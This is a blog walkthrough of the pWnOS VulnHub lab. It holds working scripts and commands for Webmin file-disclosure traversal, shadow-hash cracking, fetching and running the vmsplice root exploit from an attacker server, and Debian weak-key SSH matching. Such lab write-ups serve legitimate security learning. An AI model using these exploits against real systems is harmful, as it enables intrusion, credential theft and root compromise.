It has been a long time since I wrote a blog post. I hope this time I keep writing, starting with a machine walkthrough.

You can download the image for this VM from VulnHub.

The walkthrough will be detailed. Let's start with the machine.

I have already imported the virtual machine into VMware Workstation. You will be greeted by the screen below once the machine boots, whether you run it in VMware Workstation or in VirtualBox.

[Image: pWnOS machine booted]

I have already logged into my Kali machine. First we need the IP address of the pWnOS machine; netdiscover, a utility preinstalled in Kali, finds it by ARP-scanning the local network, as seen below:

[Image: netdiscover output]

Knowing which services run on the target is what builds the attack surface. We use Nmap, a command-line port scanner, with service version detection so we learn not just which ports are open but what software answers on them:

[Image: nmap output showing the open ports]

Several ports are open. The interesting one is port 10000, where MiniServ 0.01 (Webmin httpd) is running. A quick search shows that this Webmin version has an unauthenticated arbitrary file disclosure bug, and Metasploit ships a module for it.

[Image: Metasploit search results showing the available Webmin modules]

1st Method

Use the highlighted auxiliary module, auxiliary/admin/webmin/file_disclosure (the one with the RPATH option). After `use`, set RHOSTS to the pWnOS IP and check that RPORT is 10000.

[Image: options of the Webmin file disclosure auxiliary module]

The RPATH option is set to /etc/passwd by default, so running the module as-is extracts that file:

[Image: /etc/passwd retrieved via RPATH]

Now set RPATH to /etc/shadow and run the module again. Webmin's miniserv runs as root, which is why an unauthenticated file read reaches a file that is normally only readable by root:

[Image: /etc/shadow retrieved via RPATH]
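As an added example (not from the original post and not the Metasploit module's code), the shell snippet below reproduces the module's request by hand with curl, so files can be pulled without msfconsole, and then turns a disclosed /etc/passwd into the list of authorized_keys paths worth requesting next, which is what the second method later in this post relies on. It assumes the bug is reached through /unauthenticated/ with the ..%01/ traversal sequence used by the public exploits for this Webmin flaw (CVE-2006-3392), that 192.168.10.9 stands in for the pWnOS IP, and that the passwd lines in the demo are constructed, not the real pWnOS file:

```shell
#!/bin/sh
# Added example, not from the original post or from Metasploit.
# Assumptions: Webmin's unauthenticated file disclosure (CVE-2006-3392) is
# reached via /unauthenticated/ with the "..%01/" traversal sequence the public
# exploits use; 192.168.10.9 is a placeholder for the pWnOS IP address.

# Build the disclosure URL. Arguments: host, port, absolute file path, and the
# number of "..%01/" components (default 40, plenty to reach the filesystem root).
webmin_disclosure_url() {
    host=$1; port=$2; file=$3; depth=${4:-40}
    traversal=""
    i=0
    while [ "$i" -lt "$depth" ]; do
        traversal="${traversal}..%01/"
        i=$((i + 1))
    done
    # "${file#/}" drops the leading slash so the path does not contain "//".
    printf 'http://%s:%s/unauthenticated/%s%s\n' "$host" "$port" "$traversal" "${file#/}"
}

# Fetch a file through the bug. --path-as-is keeps curl from normalising the
# path before sending it; -f turns a 403/404 into a non-zero exit code.
webmin_disclose() {
    curl -sf --path-as-is "$(webmin_disclosure_url "$@")"
}

# Given a disclosed /etc/passwd, print the authorized_keys paths worth
# requesting next: root's, plus every account with a /home directory and an
# interactive shell (UID >= 1000 on Ubuntu; system accounts are skipped).
ssh_key_targets() {
    awk -F: '
        $1 == "root" { print "/root/.ssh/authorized_keys"; next }
        $3 >= 1000 && $6 ~ /^\/home\// && $7 !~ /(nologin|false)$/ {
            print $6 "/.ssh/authorized_keys"
        }' "$1"
}

# Network usage:
#   webmin_disclose 192.168.10.9 10000 /etc/passwd > passwd.txt
#   webmin_disclose 192.168.10.9 10000 /etc/shadow > shadow.txt
# Stand-alone demo on a constructed passwd excerpt (not the real pWnOS file):
webmin_disclosure_url 192.168.10.9 10000 /etc/shadow 3
sample=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$sample"
printf 'sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin\n' >> "$sample"
printf 'vmware:x:1000:1000:,,,:/home/vmware:/bin/bash\n' >> "$sample"
ssh_key_targets "$sample"
rm -f "$sample"
```

The depth argument matters only in that it must be at least the nesting depth of Webmin's own directory; a surplus of ../ components is harmless once the root of the filesystem is reached, which is why 40 is a safe default.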

The shadow file gives us 5 password hashes. Save those user:hash lines into a file called shadow.txt, then hand them to John the Ripper, a command-line password cracker, together with the rockyou wordlist:

john --wordlist=/usr/share/wordlists/rockyou.txt --fork=5 shadow.txt

John cracked 1 of the 5 hashes: the vmware user's password.

[Image: hash cracked by John]
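As an added example (not from the original post), the snippet below prepares the two disclosed files for John the way unshadow(8) does: it joins /etc/passwd and /etc/shadow on the username so John sees each account's name, UID and GECOS field (its single-crack mode derives guesses from them), and it drops entries whose hash field is empty, `*` or `!`-locked, since those cannot be cracked and only inflate the run. It assumes the files were saved as passwd.txt and shadow.txt; the account lines in the demo are constructed, not the real pWnOS data:

```shell
#!/bin/sh
# Added example, not from the original post. Assumptions: passwd.txt and
# shadow.txt are the files saved from the two RPATH downloads; the sample
# lines in the demo are constructed, not the real pWnOS accounts.

# Join passwd and shadow on the username, producing unshadow-style lines:
#   user:hash:uid:gid:gecos:home:shell
# Entries whose hash field is empty, "*" or starts with "!" are not crackable
# and are dropped.
john_input() {
    passwd=$1; shadow=$2
    awk -F: -v OFS=: -v shadow="$shadow" '
        FILENAME == shadow { hash[$1] = $2; next }
        ($1 in hash) && hash[$1] != "" && hash[$1] !~ /^[*!]/ {
            print $1, hash[$1], $3, $4, $5, $6, $7
        }' "$shadow" "$passwd"
}

# How many hashes John will actually work on.
crackable_count() {
    john_input "$1" "$2" | wc -l | tr -d ' '
}

# Usage on the real files:
#   john_input passwd.txt shadow.txt > unshadowed.txt
#   john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
#   john --show unshadowed.txt
# Stand-alone demo on constructed data (the hashes are not real md5crypt values):
p=$(mktemp); s=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$p"
printf 'daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n' >> "$p"
printf 'vmware:x:1000:1000:,,,:/home/vmware:/bin/bash\n' >> "$p"
printf 'root:$1$samplesa$notarealhash00000000000:14000:0:99999:7:::\n' > "$s"
printf 'daemon:*:14000:0:99999:7:::\n' >> "$s"
printf 'vmware:$1$samplesb$notarealhash11111111111:14000:0:99999:7:::\n' >> "$s"
john_input "$p" "$s"
echo "crackable: $(crackable_count "$p" "$s")"
rm -f "$p" "$s"
```

John accepts shadow.txt on its own as well, but without the passwd join it has no usernames or GECOS to feed its single-crack rules, so the joined file is the better input. The `--fork` option used above needs the jumbo build of John, which is what Kali ships.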

With the cracked password we can log in over SSH as vmware, as shown below:

[Image: logged in via SSH as vmware]

Let's check what sudo privileges the vmware user has with `sudo -l`:

[Image: sudo -l output]

vmware has no sudo rights, so we look at the kernel version next:

[Image: kernel version]

A search for that kernel version turns up the following local privilege escalation exploit, which Kali ships in its exploitdb copy (searchsploit vmsplice finds it):

Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)

I started the Apache web server on my Kali machine to serve the exploit to the target:

service apache2 start

Copy the exploit into the web root:

cp /usr/share/exploitdb/exploits/linux/local/5092.c /var/www/html/

Now download the exploit onto the victim from the limited shell, compile it with gcc, which happens to be installed on this target (if it were not, you would compile it on a matching system and copy the binary over), and run it:

wget http://192.168.10.8/5092.c
gcc 5092.c -o exploit
./exploit
[Image: wget of the exploit on the target]
[Image: compiling the exploit with gcc]
[Image: root shell]

Hurray, we got root 😉

2nd Method

The file disclosure bug also gives us a second route. Looking at /etc/passwd again, a few real users are listed at the very end. Each of them can log in over SSH with a key, and the public keys an account accepts live in the hidden .ssh directory of its home directory, in the file authorized_keys. Let's fetch that file through the same RPATH option (for the vmware user, /home/vmware/.ssh/authorized_keys):

[Image: authorized_keys of the vmware user]

You might wonder why we care about authorized_keys. In this scenario the file disclosure vulnerability lets us read the authorized_keys file in every user's home directory, and each line in it is the public half of an RSA key pair. The public key alone does not let us log in; whoever holds the matching private key does.

So where do the private keys come from? Good question 😀 Google solved this problem too. The keys on this machine were generated with the Debian OpenSSL build whose random number generator was broken (CVE-2008-0166), so the set of keys it could ever produce is small enough to enumerate, and a pre-generated collection of them exists for both 1024- and 2048-bit RSA keys. Here we need the 2048-bit set. The link below points at that collection:

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

The command below downloads the key set. I have already downloaded it to my Kali machine.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
[Image: RSA key set downloaded]

Now extract the file with the following command:

tar vxjf 5622.tar.bz2

Now we brute force the match: find which key in the set corresponds to the entry in the disclosed authorized_keys. The public key body is the second field of that line, so search the 2048-bit keys for it (assuming the disclosed file was saved as authorized_keys inside the rsa directory):

cd rsa
grep -lr "$(awk '{print $2}' authorized_keys)" 2048/
[Image: matching RSA key found]
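As an added example (not from the original post and not part of the 5622 key set), the snippet below automates that match: it pulls the base64 body of every key out of a disclosed authorized_keys file, searches the extracted key directory for a .pub carrying that body, and prints the private key path to pass to ssh -i. It assumes the key set is laid out as in 5622.tar.bz2, with each private key file next to a .pub of the same name, and the keys it creates for its demo are constructed strings, not real key material:

```shell
#!/bin/sh
# Added example, not from the original post or from the 5622 key set.
# Assumptions: the key set has "<name>" (private) beside "<name>.pub" as in
# 5622.tar.bz2; the sample keys below are constructed strings, not real keys.

# Print the base64 body of each key in an authorized_keys file. The body is the
# first field starting with "AAAA", so entries with leading options such as
# from="..." or command="..." are handled; comments and blank lines are skipped.
authorized_key_bodies() {
    awk '!/^[[:space:]]*(#|$)/ {
        for (i = 1; i <= NF; i++) if ($i ~ /^AAAA/) { print $i; break }
    }' "$1"
}

# For each body, find the .pub in the key set that contains it and print the
# matching private key path (same name without ".pub"). A fixed-string grep on
# the full base64 body is effectively an exact match for real keys.
find_weak_key() {
    authkeys=$1; keydir=$2
    authorized_key_bodies "$authkeys" | while read -r body; do
        find "$keydir" -name '*.pub' -print0 | xargs -0 grep -lF -- "$body" |
        while read -r pub; do
            printf '%s\n' "${pub%.pub}"
        done
    done
}

# Build a constructed sample: two fake weak keys, and an authorized_keys whose
# first entry (with an options prefix) matches the second key and whose second
# entry matches nothing. Prints the sample directory.
make_sample_keys() {
    d=$(mktemp -d)
    mkdir "$d/2048"
    printf 'ssh-rsa AAAAB3NzaSAMPLEONE00000 constructed@weak\n' > "$d/2048/0000aaaa-1.pub"
    : > "$d/2048/0000aaaa-1"
    printf 'ssh-rsa AAAAB3NzaSAMPLETWO11111 constructed@weak\n' > "$d/2048/0000bbbb-2.pub"
    : > "$d/2048/0000bbbb-2"
    {
        printf '# constructed authorized_keys, not the disclosed pWnOS file\n'
        printf 'from="10.0.0.1" ssh-rsa AAAAB3NzaSAMPLETWO11111 vmware@pwnos\n'
        printf 'ssh-rsa AAAAB3NzaNOTINTHESET99999 other@host\n'
    } > "$d/authorized_keys"
    printf '%s\n' "$d"
}

# Real usage: find_weak_key authorized_keys rsa/2048
# Stand-alone demo on the constructed sample:
sample=$(make_sample_keys)
find_weak_key "$sample/authorized_keys" "$sample/2048"
rm -rf "$sample"
```

On the real 2048-bit set this searches tens of thousands of small files, which takes a few seconds; if several users' authorized_keys were disclosed, run it once per file so the output tells you which key belongs to which account.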

We have a match. Log in over SSH with that private key and run the same local privilege escalation exploit as in the 1st method:

ssh -i 2048/d8629ce6dc8f2492e1454c13f46adb26-4566 <user>@<pWnOS IP>
[Image: root shell]

Hurray, we got root again 😀

If you are interested in how SSH key-based authentication is configured on a Linux server, read my blog post on that topic.

Thanks for stopping by here, if you like this blog post do leave a comment below.


